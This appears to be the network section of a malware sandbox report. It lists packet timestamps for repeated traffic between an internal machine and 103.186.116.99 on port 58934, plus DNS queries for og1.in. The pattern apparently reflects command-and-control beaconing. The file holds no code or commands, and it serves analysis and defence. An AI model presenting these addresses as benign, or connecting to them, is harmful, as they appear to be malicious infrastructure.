                                                                                                                                Oct 1, 2024 09:29:19.617306948 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:19.642407894 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:19.643649101 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:19.648641109 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:19.648719072 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:19.648727894 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:19.648735046 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:19.648742914 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038503885 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038583994 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038590908 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038599014 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038649082 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038656950 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038664103 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.038671970 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.039316893 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.039324999 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043401957 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043410063 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043412924 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043420076 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043426991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043466091 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.043502092 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.325005054 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:26.329955101 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.777539968 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.801042080 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:26.802288055 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:26.805970907 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.805983067 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806045055 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806052923 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806060076 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806067944 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806075096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806197882 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806205988 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.806243896 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810609102 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810645103 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810688019 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810695887 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810731888 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810740948 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810782909 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810810089 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810817957 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810823917 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810842991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810915947 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.339018106 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.344269037 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.662436962 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.686058044 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.686104059 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.691611052 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691685915 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691694021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691700935 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691728115 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691735983 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691801071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691880941 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691966057 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691973925 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696285963 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696337938 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696346045 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696352959 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696360111 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696386099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696428061 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696434975 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696443081 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696451902 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696470022 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696518898 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696527004 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.354784012 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.359702110 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.676959991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.710134983 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.711630106 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.715099096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715109110 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715121984 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715239048 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715291977 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715306997 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716483116 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716490984 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716499090 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716506004 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720240116 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720248938 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720256090 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720352888 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720360994 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720367908 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720375061 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720381021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720388889 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720396042 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720494032 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720500946 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720508099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.370155096 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.375294924 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.693953991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.717158079 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.717211962 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.722902060 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722949982 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722963095 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722974062 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722986937 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722997904 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723051071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723064899 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723083973 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723105907 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748809099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748941898 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748972893 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749013901 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749051094 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749099016 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749123096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749145031 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749171019 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749216080 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749228001 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749238968 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749560118 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.381011963 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.385972023 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.703275919 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.951226950 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.951292038 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.995783091 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.997507095 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:31.001456022 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001473904 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001554012 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001565933 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001578093 CEST5893449176103.186.116.99192.168.2.22
Oct 1, 2024 09:29:31.001589060 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.001600981 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.001612902 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.001624107 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006680965 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006695032 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006926060 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006938934 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006948948 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006959915 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006972075 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006983042 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.006993055 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.007004976 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.007016897 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.007028103 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.007060051 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.007071972 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.395023108 CEST | 49175 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:31.399960995 CEST | 58934 | 49175 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.755954027 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.782355070 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:31.782406092 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:31.787137032 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787173986 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787190914 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787269115 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787280083 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787291050 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787343025 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787364960 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787375927 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.787400007 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791903973 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791918039 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791939020 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791950941 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791961908 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.791975975 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.792006969 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.792018890 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:31.792030096 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.409070015 CEST | 49175 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:32.414238930 CEST | 58934 | 49175 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.732117891 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.757190943 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:32.758394003 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:32.762039900 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762056112 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762063980 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762072086 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762116909 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762187958 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762233019 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762239933 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762247086 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.762286901 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766740084 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766748905 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766815901 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766824007 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766832113 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766846895 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766910076 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.766972065 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.767019033 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:32.767030954 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.423100948 CEST | 49175 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:33.427983046 CEST | 58934 | 49175 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.750643969 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.774938107 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:33.775506020 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:33.779840946 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779850006 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779859066 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779866934 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779913902 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779922009 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779928923 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779936075 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.779983997 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.780040026 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784532070 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784539938 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784580946 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784589052 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784595966 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784627914 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784739971 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784749031 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:33.784758091 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.437010050 CEST | 49175 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:34.441886902 CEST | 58934 | 49175 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.759896040 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.786956072 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:34.788373947 CEST | 49176 | 58934 | 192.168.2.22 | 103.186.116.99
Oct 1, 2024 09:29:34.791814089 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.791894913 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.791996002 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792004108 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792011976 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792027950 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792036057 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792042971 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792049885 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.792058945 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796593904 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796602964 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796684980 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796694040 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796700954 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.796710968 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Oct 1, 2024 09:29:34.797049999 CEST | 58934 | 49176 | 103.186.116.99 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 09:25:06.115017891 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:06.127619982 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:07.899368048 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:07.910640955 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:07.912576914 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:07.919339895 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:12.443418980 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:12.454793930 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:12.456074953 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:12.467856884 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:14.102565050 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:14.109524012 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:14.112076044 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:14.122888088 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:26.467282057 CEST | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:26.474102974 CEST | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Oct 1, 2024 09:25:34.116450071 CEST | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Oct 1, 2024 09:25:34.125931978 CEST | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 1, 2024 09:25:06.115017891 CEST | 192.168.2.22 | 8.8.8.8 | 0xa057 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.899368048 CEST | 192.168.2.22 | 8.8.8.8 | 0x363e | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:07.912576914 CEST | 192.168.2.22 | 8.8.8.8 | 0x4496 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.443418980 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:12.456074953 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.102565050 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
Oct 1, 2024 09:25:14.112076044 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false
